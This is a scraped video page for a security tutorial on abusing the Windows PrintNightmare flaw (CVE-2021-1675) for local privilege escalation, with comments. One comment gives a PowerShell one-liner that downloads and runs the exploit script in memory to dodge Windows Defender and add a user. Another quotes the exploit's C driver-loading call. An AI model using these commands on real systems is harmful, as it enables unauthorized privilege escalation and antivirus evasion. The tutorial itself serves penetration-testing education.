Abusing PrintNightmare (CVE-2021-1675) - Local Privilege Escalation

Поділитися
Вставка
  • Опубліковано 18 чер 2024
  • The exploit abuses the Print Spooler in Windows to load malicious DLL files. This video shows how this exploit is being used as a local privilege escalation, along with how to mitigate against these attacks. Check out the next video to see how this same vulnerability can be used for Remote Code Execution against a Domain Controller.
    Disclaimer: This content is intended to be consumed by cyber security professionals, ethical hackers, and penetration testers. Any attacks performed in this video should only be performed in environments that you control or have explicit permission to perform them on.
    Please consider sharing with a friend, hitting the like button, and subscribing!
    Github Resources mentioned in this video:
    github.com/calebstewart/CVE-2...
    github.com/cube0x0/CVE-2021-1675
    Part Two:
    • Abusing PrintNightmare...
    👇 SUBSCRIBE TO INFINITELOGINS UA-cam CHANNEL NOW 👇
    ua-cam.com/users/infinitelog...
    00:00 - Intro
    00:50 - Exploits on Github
    02:50 - Reviewing Environment
    05:40 - Running Exploit
    10:00 - Mitigation
    ___________________________________________
    Social Media:
    Website: infinitelogins.com/
    Twitter: / infinitelogins
    Twitch: / infinitelogins
    ___________________________________________
    Donations and Support:
    Like my content? Please consider supporting me on Patreon:
    / infinitelogins
    Purchase a VPN Using my Affiliate Link
    www.privateinternetaccess.com...
    ___________________________________________
    #CVE #PrintNightmare #WindowsVulnerablility

КОМЕНТАРІ • 24

  • @InfiniteLogins
    @InfiniteLogins  2 роки тому +3

    Part 2 show Remote Code Execution against a Domain Controller will be available today at 2 PM PDT - Check link in description!

  • @wowleague6779
    @wowleague6779 2 роки тому +4

    Best explanation so far

  • @Dexterlex
    @Dexterlex 2 роки тому

    One thing would like to see within your channel is AV evasion and stuff like that anyways its great to watch your videos

    • @InfiniteLogins
      @InfiniteLogins  2 роки тому +1

      Thanks! AV evasion is tough one since it changes so much - and definitely not my strong suit. I'll share it as soon as I learn more about it!

    • @Dexterlex
      @Dexterlex 2 роки тому

      @@InfiniteLogins Yeah sure thanks for looking into it. Hoping to see soon

  • @ARZ10198
    @ARZ10198 2 роки тому +1

    Nice explanation , Can the next video be about kerberos delegations ?

  • @johnsnow1062
    @johnsnow1062 2 роки тому

    cool

  • @JSONSEC
    @JSONSEC 2 роки тому +1

    This isn't going to have any problems with UA-cam censorship =p.
    Thanks for the videos tho, been searching around for the powershell script for this

    • @InfiniteLogins
      @InfiniteLogins  2 роки тому +2

      Shouldn't. Nothing malicious about this and I have others on the channel just like it.

    • @jasonford2877
      @jasonford2877 2 роки тому

      🤞

  • @bgrassguitarpicker
    @bgrassguitarpicker 2 роки тому

    When you run the script, do you have the "Point and Print" GPO enabled? Thank you

  • @bathtoaster335
    @bathtoaster335 Місяць тому

    Hi mate, been trying to do this for a uni assignment, and I have been getting some errors trying this on Windows 7, could you please recommend a link or method to get an ISO for the Win10 virtual machine like yours, and also any set up or adjustments that need to be made? Thank you heaps

  • @kientran9766
    @kientran9766 2 роки тому

    When i tried to connect user victim and password victim, it worked. However, I tried to connect that doesn't used password, it didnt worked. The command used:
    Python3 CVE........ domain/user:@ip victim '\\ipattacker\smb\*.dll
    ..... now, i can't connect if victim doesn't password.

  • @nexsploit4444
    @nexsploit4444 2 роки тому +1

    Note - copying and pasting the actual script and writing it to disk will get picked up by AV (Windows Defender), so keep it in memory and do this instead so that it doesn't get picked up:
    iex(iwr raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1 -UseBasicParsing); Invoke-Nightmare -NewUser "User1" -NewPassword "password123" -DriverName "PrintMe"
    :) hope that helps

    • @nexsploit4444
      @nexsploit4444 2 роки тому +2

      put this here cause i was testing it along with the video and noticed Defender didn't like that lol ;)

    • @InfiniteLogins
      @InfiniteLogins  2 роки тому +3

      Thanks!

    • @nexsploit4444
      @nexsploit4444 2 роки тому +1

      @@InfiniteLogins npnp!

  • @bugsysiegals
    @bugsysiegals 2 роки тому

    Is this really your typing speed? How many words per minute are you typing? LOL

  • @bugsysiegals
    @bugsysiegals 2 роки тому

    While PS seems like a good idea, avoiding Linux, you'd be leaving footprints with PS history ... this doesn't seem ideal to me ...

  • @sbypasser819
    @sbypasser819 2 роки тому

    Everyone says it works on all versions of windows, BUT IT DOESNT WORK ON WINDOWS 7!
    This:
    DRIVER_INFO_2W di = {};
    di.cVersion = 3;
    di.pName = (LPWSTR)L"1111";
    di.pEnvironment = (LPWSTR)L"Windows x64";
    di.pDataFile = (LPWSTR)DLL_PATH;
    di.pConfigFile = (LPWSTR)DLL_PATH;
    di.pDriverPath = (LPWSTR)L"C:\\Test\\UNIDRV.DLL";
    AddPrinterDriverExW(0, 2, (PBYTE) & di, 0);
    This gives error 5 on win7, on win10 before 21h2 it works.